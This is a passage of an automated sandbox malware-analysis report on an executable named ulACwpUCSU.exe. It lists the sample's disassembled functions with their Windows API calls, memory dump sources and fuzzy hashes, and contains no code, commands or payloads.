                                          • Instruction Fuzzy Hash: 8DF0F6B3B041047ACB41ABB59E4AE5D2BA4EB41718F240A3BF400F71C2DAFC8841F728
                                          Function 100027EC Relevance: 3.2, APIs: 2, Instructions: 156COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2905161694.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2905123603.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000000.00000002.2905192299.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000000.00000002.2905221858.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: EnumErrorLastWindows
                                          • String ID:
                                          • API String ID: 14984897-0
                                          • Opcode ID: 10da2a693ced731503c2d5b3de2f7fe8e431c949d2a6016fe146597bbe82a282
                                          • Instruction ID: 2b4501ff186f60f2b29b8b71d76009b37135a14f8b8ad132536a4a21bb517402
                                          • Opcode Fuzzy Hash: 10da2a693ced731503c2d5b3de2f7fe8e431c949d2a6016fe146597bbe82a282
                                          • Instruction Fuzzy Hash: 9E51A4BA908214DFFB14DF60DCC5B5937A8EB443D4F218429EA08E725DDF38A981CB94
                                          Function 004023C8 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,00000168,00000000,00000022,00000000,?,?), ref: 00402B2F
                                          • RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004023F8
                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso2EBB.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          • Opcode ID: 7eb33a159c5e2e36f52cd260ea1f941ce228b1fcd6854e0b7c510fd00de33ed5
                                          • Instruction ID: 6e7bf8a8071b86039a0630bdde8d6c62460c4efec4bb82e40fe4d514ce07d4c8
                                          • Opcode Fuzzy Hash: 7eb33a159c5e2e36f52cd260ea1f941ce228b1fcd6854e0b7c510fd00de33ed5
                                          • Instruction Fuzzy Hash: 6711C171905205EFDB11DF60CA889BEBBB4EF00344F20843FE441B62C0D2B84A41EB6A
                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
                                          • Instruction ID: da56ad7cfcb2a9fecb994a09e4a0bd113f750103611445cd7b28aada07ee45e3
                                          • Opcode Fuzzy Hash: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
                                          • Instruction Fuzzy Hash: 2E012831B24210ABE7294B389D04B6A369CE710328F11823BF811F72F1D6B8DC42DB4D
                                          Function 004022C0 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,00000168,00000000,00000022,00000000,?,?), ref: 00402B2F
                                          • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004022DF
                                          • RegCloseKey.ADVAPI32(00000000), ref: 004022E8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: CloseDeleteOpenValue
                                          • String ID:
                                          • API String ID: 849931509-0
                                          • Opcode ID: 9fe761724c1276d574af105ef08c00a5703bee9f5c9ace5d1d1e19f8a1f69dfd
                                          • Instruction ID: 2c42072c31bcbbe471fcd7c214f11599c8a5ac898b8b604777345a29c8a948e9
                                          • Opcode Fuzzy Hash: 9fe761724c1276d574af105ef08c00a5703bee9f5c9ace5d1d1e19f8a1f69dfd
                                          • Instruction Fuzzy Hash: 65F04F72A04111ABDB51ABB49A8EAAE6268AB40318F14453BF501B61C1DAFC5E01A66E
                                          Function 0040155B Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                          Download Yara Rule
                                          APIs
                                          • ShowWindow.USER32(000104BA), ref: 00401579
                                          • ShowWindow.USER32(000104B4), ref: 0040158E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: ShowWindow
                                          • String ID:
                                          • API String ID: 1268545403-0
                                          • Opcode ID: c64c6d1f079b89554086766a5c5b018e70a08e7419b7e9e5f4a1fba6667fe9af
                                          • Instruction ID: 8a385b190166ef4faee7ea7f7faf61a79327429c222f4cee9526e2a72d22cdd5
                                          • Opcode Fuzzy Hash: c64c6d1f079b89554086766a5c5b018e70a08e7419b7e9e5f4a1fba6667fe9af
                                          • Instruction Fuzzy Hash: 9FF0E577B08250BFC725CF64ED8086E77F5EB5531075444BFD102A3292C2B89D04DB18
                                          Function 00401DAC Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                          Download Yara Rule
                                          APIs
                                          • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DC2
                                          • EnableWindow.USER32(00000000,00000000), ref: 00401DCD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Window$EnableShow
                                          • String ID:
                                          • API String ID: 1136574915-0
                                          • Opcode ID: 3f66373841930f62a7e084ead73e64351eb2d9defc74f476aa24081e3a98abe9
                                          • Instruction ID: 18ac702c75a7039fec00373c4f699ed09bc4c8ec852dd7b5b9a0ef8cb6e9c66a
                                          • Opcode Fuzzy Hash: 3f66373841930f62a7e084ead73e64351eb2d9defc74f476aa24081e3a98abe9
                                          • Instruction Fuzzy Hash: 39E0CD72B04110EBCB10BBB45D4A55E3374DF10359B10443BF501F11C1D2B85C40565D
                                          Function 004059C7 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\ulACwpUCSU.exe,80000000,00000003), ref: 004059CB
                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059ED
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: File$AttributesCreate
                                          • String ID:
                                          • API String ID: 415043291-0
                                          • Opcode ID: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
                                          • Instruction ID: 21e5f81f3e52fa2c8f9e5bc24a994218dd140026ef3a1e453d479de883aad6ce
                                          • Opcode Fuzzy Hash: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
                                          • Instruction Fuzzy Hash: 94D09E31668301AFEF098F20DD16F2E7BA2EB84B00F10562CB682D40E0D6755815DB16
                                          Function 004059A2 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesA.KERNELBASE(?,?,004055BA,?,?,00000000,0040579D,?,?,?,?), ref: 004059A7
                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 004059BB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
                                          • Instruction ID: a98ca5448702c3e829ea1667e49b0be7f6aa4c87fef4348ac0342a167d80fd98
                                          • Opcode Fuzzy Hash: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
                                          • Instruction Fuzzy Hash: 19D0C9B2918120EBC2102728AD0889BBF69EB542717018B31F865A22B0C7304C52DAA9
                                          Function 0040223B Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                          Download Yara Rule
                                          APIs
                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402274
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: PrivateProfileStringWrite
                                          • String ID:
                                          • API String ID: 390214022-0
                                          • Opcode ID: 9ff6483e56f83e050050973c75d29e7e6846100e3a8c6593062fb544488b0e4d
                                          • Instruction ID: 05d4d75dbd01593bae97f630dbecede8c42f44da552b6d0f9ca4defc7305ba5b
                                          • Opcode Fuzzy Hash: 9ff6483e56f83e050050973c75d29e7e6846100e3a8c6593062fb544488b0e4d
                                          • Instruction Fuzzy Hash: 2FE04F72B001696ADB903AF18F8DD7F21597B84304F15067EF611B62C2D9BC0D81A2B9
                                          Function 00402B07 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(00000000,00000168,00000000,00000022,00000000,?,?), ref: 00402B2F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: ebfeba3ed9c8d95cb46d76ca19a6c1a04daa5e79448631d0a062a8db0bedbb5d
                                          • Instruction ID: 087740a894708ae54e311fe38564fcb001a0ed9e3d0f4d4a62d19f1d4de25a1d
                                          • Opcode Fuzzy Hash: ebfeba3ed9c8d95cb46d76ca19a6c1a04daa5e79448631d0a062a8db0bedbb5d
                                          • Instruction Fuzzy Hash: 38E046B6250108AADB40EFA4EE4AF9537ECFB04700F008021BA08E7091CA78E5509B69
                                          Function 00405A3F Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,004128A0,0040A8A0,004031C9,00409130,00409130,004030BB,004128A0,00004000,?,00000000,?), ref: 00405A53
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
                                          • Instruction ID: 55609983f428609d3339a900fe5ea2c3161a13bcf9e808ef2cae39733250456b
                                          • Opcode Fuzzy Hash: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
                                          • Instruction Fuzzy Hash: F7E08C3231025AABDF109EA09C40AEB3B6CEB00760F084432FA14E2040D230E9218FA5
                                          Function 1000270F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 1000272D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2905161694.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2905123603.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000000.00000002.2905192299.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000000.00000002.2905221858.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                          • Instruction ID: 4dab7c069dd6fc30f8915db09394f7f991a1b088a201bba37056324bf7fcc065
                                          • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                          • Instruction Fuzzy Hash: 98F09BF19092A0DEF360DF688CC47063FE4E3993D5B03852AE358F6269EB7441448B19
                                          Function 0040227F Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022B2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: PrivateProfileString
                                          • String ID:
                                          • API String ID: 1096422788-0
                                          • Opcode ID: f8d132d461a5c4ed5c76335474cd8e98aaa4b1821b9353edac55918b86fd9ae5
                                          • Instruction ID: 1024819f7f1d2ea578916dba6ac29c28ac22902c13986e1de9ff5d702d2d6265
                                          • Opcode Fuzzy Hash: f8d132d461a5c4ed5c76335474cd8e98aaa4b1821b9353edac55918b86fd9ae5
                                          • Instruction Fuzzy Hash: B9E08671A44209BADB406FA08E09EBD3668BF01710F10013AF9507B0D1EBB88442F72D
                                          Function 00404038 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageA.USER32(000104AE,00000000,00000000,00000000), ref: 0040404A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                          • Instruction ID: af7fd4c3fc1dda8ad1a195a9021ea177fcc43fc0d0bb539f8953ea950d20d41d
                                          • Opcode Fuzzy Hash: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                          • Instruction Fuzzy Hash: DFC09B717443007BEA31DB509D49F077758A750B00F5584357320F50D0C6B4F451D62D
                                          Function 00404021 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageA.USER32(00000028,?,00000001,00403E52), ref: 0040402F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                          • Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
                                          • Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                          • Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19
                                          Function 004031CC Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
